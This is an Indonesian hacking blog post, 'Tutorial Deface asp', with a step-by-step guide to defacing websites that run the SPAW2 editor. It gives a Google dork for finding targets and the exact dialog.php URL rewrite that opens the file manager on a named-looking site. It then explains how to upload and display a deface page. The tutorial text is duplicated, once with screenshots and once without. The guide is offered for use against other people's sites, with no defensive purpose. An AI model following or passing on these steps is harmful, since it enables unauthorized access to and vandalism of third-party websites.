google dork : inurl:"spaw2/uploads/files/"
setelah mencari kesana kemari misalnya kita udah dpt target..
example :
Code:
http://www.corporation22.com/cms/spaw2/uploads/files/Solar_modules/HS-122st.pdf
gimana lagi nih? okeh..
ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf
menjadi
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2⟨=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi
http://www.corporation22.com/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%E2%8C%A9=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
hmm gimana buat upload file deface kita??
begini
lihat pilihan folder di atas, pada link target yang telah di exploit Spaw td, kemudian ubah "images" menjadi "files"
seperti gambar :
![[Image: 216711_115497381863480_100002096566712_1...9466_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tE9pr7hRn8iB5F3XtHg3DgWML5xF0pMIfmU6s689vdgItXzDdb0DmPISqsw_b7BfsKw9OlOsTeAJAMzKJeFf1Bfr0Y17qwABEycvAhPww8Aw4BkuRrjiYptDsI04YFQbSoZbIfT7Qr3kyy4ajdBSNQhdMyDNpx2q5sdx9VKUDEbJAGqX6i0Qc3hyg=s0-d)
kemudian upload
![[Image: 207321_115498021863416_100002096566712_1...6993_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tT0qvnaQZor-bE03or8SGDDGjCU-pai8RfenvEr6i6gJV1T73-j3uzqV1S7JshAYsNkWANLZw44NcjmeOF_a7O9cwl_nrdYwf2s49LhnkFeOcwEgD0dKFZ5RzRu7Q6NpkE9K8TJ5n-fasJ_238EoZJBf2FUpJ-cKj3CcYIe9qw4qRNRZsQkuPh2-1J=s0-d)
setelah selesai klik browse lalu upload file deface kalian..
seperti gambar :
![[Image: 216507_115497471863471_100002096566712_1...7884_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uQepMh9pd227yXMFTKRUWK4WK1JusUHR5F6JGeeUILkSj1okuFKoBGITQm7jObsnGjFD4fLwJ5IamvGiPgrEsxdFnzIOesl4AY2i394oLo9vg1w97MEpFWL5e8Roy4aIB4uZuPgUOY5efPN9TbU2x7obQXBvoD8_sxdbL75patwgdUrT7eLqUCrkLu=s0-d)
kalo udah di upload gimana lagi supaya muncul hasil deface kita??
begini,
lihat dulu nama file yg kalian upload td apa.. setelah ketemu lihat disamping kanan kemudian klik [download files]
![[Image: 217017_115499915196560_100002096566712_1...4444_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t-f1hcOqbG4Te0fWe7KREDhrrq931vBZ7vYIEeO_jZ6NJrl-Q4rCfdp16EcRV9ghcxZ8zDXMwaGB0Kuwg0PncmgmTwt8u_brc8_Au4tkiy--TtS_a2SaxoPxleJShyQLNY_-TQq3lL9PwAskAVkzsPlgXb7O94HSNWVo2SUfPCLUh5z-zXJaeJgSf6=s0-d)
dan berikut hasil dari kerjaan diatas td :)
![[Image: 217060_115499768529908_100002096566712_1...3884_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v6MQzZuvtrX65BfyXUqxmgFNuCDnT0gQAfbZ-XGxxKMq_YKuuO53I4GvREp_JbjD8ofhKMHQWGaHwxlEaoKObBfSpWFf0P3F003YHX50j06Gu-psbfOdbxRNGvaNn1yQYjFiLFBRA1_BdDlZLnDW-3FjsPozLQO-L8OunG99Nd_2h5qkfwuYyD5qbf=s0-d)
semoga sukses
setelah mencari kesana kemari misalnya kita udah dpt target..
example :
Code:
http://www.corporation22.com/cms/spaw2/uploads/files/Solar_modules/HS-122st.pdf
gimana lagi nih? okeh..
ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf
menjadi
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2⟨=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi
http://www.corporation22.com/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%E2%8C%A9=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
hmm gimana buat upload file deface kita??
begini
lihat pilihan folder di atas, pada link target yang telah di exploit Spaw td, kemudian ubah "images" menjadi "files"
seperti gambar :
kemudian upload
setelah selesai klik browse lalu upload file deface kalian..
seperti gambar :
kalo udah di upload gimana lagi supaya muncul hasil deface kita??
begini,
lihat dulu nama file yg kalian upload td apa.. setelah ketemu lihat disamping kanan kemudian klik [download files]
dan berikut hasil dari kerjaan diatas td :)
semoga sukses
Anda baru saja membaca artikel yang berkategori Hacking
dengan judul Tutorial Deface asp. Anda bisa bookmark halaman ini dengan URL https://catatan-lutfi.blogspot.com/2012/07/tutorial-deface-asp.html. Terima kasih!
Ditulis oleh:
Lutfi rahman - Selasa, 17 Juli 2012



Belum ada komentar untuk "Tutorial Deface asp"
Posting Komentar